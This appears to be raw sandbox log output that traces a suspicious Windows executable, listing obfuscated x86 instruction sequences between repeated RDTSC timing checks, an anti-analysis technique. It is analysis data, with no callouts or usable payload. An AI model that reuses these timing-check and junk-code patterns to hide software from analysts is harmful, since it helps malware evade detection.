Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0159 second address: 54C015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C015E second address: 54C0202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF12E5B9AAEh 0x0000000f jmp 00007FF0BCB462C0h 0x00000014 mov ecx, eax 0x00000016 jmp 00007FF0BCB462C0h 0x0000001b xor eax, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FF0BCB462C7h 0x00000025 and ax, 824Eh 0x0000002a jmp 00007FF0BCB462C9h 0x0000002f popfd 0x00000030 push ecx 0x00000031 movsx edi, cx 0x00000034 pop eax 0x00000035 popad 0x00000036 and ecx, 1Fh 0x00000039 jmp 00007FF0BCB462BFh 0x0000003e ror eax, cl 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FF0BCB462C5h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0202 second address: 54C0227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BC8515DDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0227 second address: 54C028A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00B52014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007FF0C14F6505h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007FF0BCB462BEh 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FF0BCB462BDh 0x00000035 or eax, 2E9C3156h 0x0000003b jmp 00007FF0BCB462C1h 0x00000040 popfd 0x00000041 jmp 00007FF0BCB462C0h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C028A second address: 54C0290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0290 second address: 54C0294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0294 second address: 54C02C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FF0C120187Ch 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 movsx ebx, cx 0x00000016 mov cx, E0A7h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF0BC8515E9h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C02C4 second address: 54C0322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF0BCB462C2h 0x00000010 adc si, 2F68h 0x00000015 jmp 00007FF0BCB462BBh 0x0000001a popfd 0x0000001b call 00007FF0BCB462C8h 0x00000020 push eax 0x00000021 pop ebx 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF0BCB462BFh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0322 second address: 54C0326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0326 second address: 54C032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470010 second address: 547001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 454414A4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547001A second address: 54700A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF0BCB462BBh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 call 00007FF0BCB462C4h 0x00000016 mov ebx, eax 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FF0BCB462C9h 0x00000021 and esp, FFFFFFF8h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FF0BCB462C3h 0x0000002d add eax, 6475542Eh 0x00000033 jmp 00007FF0BCB462C9h 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700A5 second address: 54700AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700AA second address: 54700B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700B2 second address: 54700FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 pushad 0x00000009 mov ax, 93A7h 0x0000000d jmp 00007FF0BC8515DCh 0x00000012 popad 0x00000013 mov dword ptr [esp], ecx 0x00000016 pushad 0x00000017 push esi 0x00000018 mov ebx, 7AA016F0h 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FF0BC8515E4h 0x00000026 xor ah, 00000038h 0x00000029 jmp 00007FF0BC8515DBh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700FD second address: 547015E instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 jmp 00007FF0BCB462C0h 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FF0BCB462C0h 0x00000016 mov ebx, dword ptr [ebp+10h] 0x00000019 jmp 00007FF0BCB462C0h 0x0000001e xchg eax, esi 0x0000001f jmp 00007FF0BCB462C0h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF0BCB462BEh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547015E second address: 54701EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BC8515E1h 0x00000009 adc ax, 6346h 0x0000000e jmp 00007FF0BC8515E1h 0x00000013 popfd 0x00000014 mov dl, cl 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b jmp 00007FF0BC8515E9h 0x00000020 mov di, ax 0x00000023 popad 0x00000024 mov esi, dword ptr [ebp+08h] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FF0BC8515E8h 0x0000002e or ecx, 73D37D78h 0x00000034 jmp 00007FF0BC8515DBh 0x00000039 popfd 0x0000003a mov bl, al 0x0000003c popad 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 movsx edi, si 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54701EA second address: 5470262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BCB462BBh 0x00000009 sub al, FFFFFFEEh 0x0000000c jmp 00007FF0BCB462C9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FF0BCB462C0h 0x00000018 adc cl, 00000068h 0x0000001b jmp 00007FF0BCB462BBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], edi 0x00000027 pushad 0x00000028 mov edi, ecx 0x0000002a mov esi, 47753F57h 0x0000002f popad 0x00000030 test esi, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FF0BCB462C9h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470262 second address: 5470268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470268 second address: 54702D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FF12E60464Ah 0x00000011 pushad 0x00000012 mov bx, cx 0x00000015 pushad 0x00000016 jmp 00007FF0BCB462BEh 0x0000001b jmp 00007FF0BCB462C2h 0x00000020 popad 0x00000021 popad 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a jmp 00007FF0BCB462BEh 0x0000002f mov ch, 8Dh 0x00000031 popad 0x00000032 je 00007FF12E60461Ah 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov dx, cx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702D5 second address: 54702DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702DA second address: 54702EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702EA second address: 54702EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702EE second address: 54703A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF0BCB462BDh 0x00000012 sub eax, 0E1A87B6h 0x00000018 jmp 00007FF0BCB462C1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF0BCB462C0h 0x00000024 jmp 00007FF0BCB462C5h 0x00000029 popfd 0x0000002a popad 0x0000002b or edx, dword ptr [ebp+0Ch] 0x0000002e jmp 00007FF0BCB462BEh 0x00000033 test edx, 61000000h 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FF0BCB462BEh 0x00000040 jmp 00007FF0BCB462C5h 0x00000045 popfd 0x00000046 mov bx, cx 0x00000049 popad 0x0000004a jne 00007FF12E6045B5h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 mov dl, E8h 0x00000055 call 00007FF0BCB462C0h 0x0000005a pop ecx 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54703A6 second address: 54703AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546079D second address: 54607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54607A3 second address: 54607A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54607A7 second address: 546085A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007FF0BCB462C6h 0x00000010 pop ecx 0x00000011 pushfd 0x00000012 jmp 00007FF0BCB462BBh 0x00000017 xor ax, 7FCEh 0x0000001c jmp 00007FF0BCB462C9h 0x00000021 popfd 0x00000022 popad 0x00000023 mov di, si 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007FF0BCB462C3h 0x0000002e push esi 0x0000002f mov dl, 29h 0x00000031 pop ecx 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 jmp 00007FF0BCB462C7h 0x00000039 mov ebp, esp 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 pushfd 0x00000041 jmp 00007FF0BCB462C1h 0x00000046 sub ch, FFFFFFC6h 0x00000049 jmp 00007FF0BCB462C1h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546085A second address: 54608B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f pushfd 0x00000010 jmp 00007FF0BC8515E8h 0x00000015 sbb cl, FFFFFFC8h 0x00000018 jmp 00007FF0BC8515DBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF0BC8515E5h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608B6 second address: 54608E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF0BCB462C1h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608E4 second address: 54608EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608EA second address: 54608F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608F0 second address: 5460945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF0BC8515E0h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FF0BC8515E1h 0x00000018 mov edx, esi 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c jmp 00007FF0BC8515DAh 0x00000021 mov esi, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF0BC8515DAh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460945 second address: 546094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546094B second address: 5460951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460951 second address: 5460955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460955 second address: 5460988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF0BC8515DEh 0x00000013 sbb cx, 8808h 0x00000018 jmp 00007FF0BC8515DBh 0x0000001d popfd 0x0000001e mov eax, 243C4E7Fh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460988 second address: 54609DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 18h 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c jmp 00007FF0BCB462C6h 0x00000011 je 00007FF12E60BC9Ah 0x00000017 pushad 0x00000018 call 00007FF0BCB462BEh 0x0000001d pop edi 0x0000001e mov si, 929Dh 0x00000022 popad 0x00000023 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF0BCB462BFh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609DD second address: 5460A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BC8515DFh 0x00000009 sbb cx, B3BEh 0x0000000e jmp 00007FF0BC8515E9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF0BC8515E0h 0x0000001a add ch, FFFFFFB8h 0x0000001d jmp 00007FF0BC8515DBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov ecx, esi 0x00000028 jmp 00007FF0BC8515E6h 0x0000002d je 00007FF12E316F2Fh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov cx, di 0x00000039 pushfd 0x0000003a jmp 00007FF0BC8515E9h 0x0000003f xor cx, 90B6h 0x00000044 jmp 00007FF0BC8515E1h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460A88 second address: 5460A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460A8E second address: 5460AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 jmp 00007FF0BC8515E6h 0x00000017 jne 00007FF12E316EC8h 0x0000001d jmp 00007FF0BC8515E0h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF0BC8515DAh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460AEB second address: 5460AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460AFA second address: 5460B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FF0BC8515DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 539175C3h 0x00000018 push esi 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460B32 second address: 5460B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460B38 second address: 5460B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D46 second address: 5460D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470C07 second address: 5470C88 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 51F4BB5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, AEh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FF0BC8515DEh 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 movzx esi, dx 0x00000017 mov ebx, 47801D5Eh 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov eax, edx 0x00000022 pushfd 0x00000023 jmp 00007FF0BC8515E7h 0x00000028 or ecx, 3EE9A2BEh 0x0000002e jmp 00007FF0BC8515E9h 0x00000033 popfd 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF0BC8515E8h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470C88 second address: 5470C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470C97 second address: 5470C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470C9D second address: 5470CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F056C second address: 54F0594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF0BC8515DBh 0x00000012 pop eax 0x00000013 mov bx, 5E1Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F0594 second address: 54F05B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF0BCB462C0h 0x00000008 pop eax 0x00000009 mov dh, 90h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F05B4 second address: 54F05E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF0BC8515E5h 0x0000000a sbb al, FFFFFFD6h 0x0000000d jmp 00007FF0BC8515E1h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A39 second address: 54E0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A3F second address: 54E0A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A43 second address: 54E0A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF0BCB462BEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FF0BCB462C0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF0BCB462C7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A86 second address: 54E0A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A8C second address: 54E0A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0845 second address: 54E085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E085F second address: 54E0864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0864 second address: 54E08B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 2Dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dl, ah 0x0000000d pushfd 0x0000000e jmp 00007FF0BC8515E1h 0x00000013 sbb ecx, 63B33956h 0x00000019 jmp 00007FF0BC8515E1h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FF0BC8515E1h 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov dx, cx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E08B5 second address: 54E08B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0C74 second address: 54E0CBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, BA52h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FF0BC8515E4h 0x00000010 push eax 0x00000011 jmp 00007FF0BC8515DBh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FF0BC8515E6h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0CBF second address: 54E0CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D8A second address: 54E0D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D90 second address: 54E0D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D96 second address: 54E0D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D9A second address: 54E0D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
